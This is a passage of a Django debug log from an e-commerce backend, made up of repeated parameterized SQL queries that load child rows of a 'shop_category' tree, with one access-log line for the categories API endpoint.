"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:13:05,296 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:13:05,301 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:13:05,304 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:13:05,308 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:13:05,311 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:13:05,314 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:13:05,320 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:13:05,324 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:13:05,327 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:13:05,330 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:13:05,333 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:13:05,338 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:13:05,340 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:13:05,343 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:13:05,346 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:13:05,348 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:13:05,353 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:13:05,355 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:13:05,358 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:13:05,361 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:13:05,364 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:13:05,367 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:13:05,371 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:13:05,374 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:13:05,377 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:13:05,380 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:13:05,383 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:13:05,387 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:13:05,390 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:13:05,393 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:13:05,396 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:13:05,399 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:13:05,403 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:13:05,406 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:13:05,409 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:13:05,412 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:13:05,414 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:13:05,417 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:13:05,420 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:13:05,423 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:13:05,426 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:13:05,429 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:13:05,432 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:13:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:13:33,721 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:13:33,728 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:13:33,732 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:13:33,735 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:13:33,738 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:13:33,741 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:13:33,743 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:13:33,746 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:13:33,749 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:13:33,752 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:13:33,755 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:13:33,757 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:13:33,759 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:13:33,762 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:13:33,765 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:13:33,767 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:13:33,770 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:13:33,772 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:13:33,774 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:13:33,778 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:13:33,780 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:13:33,783 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:13:33,785 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:13:33,787 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 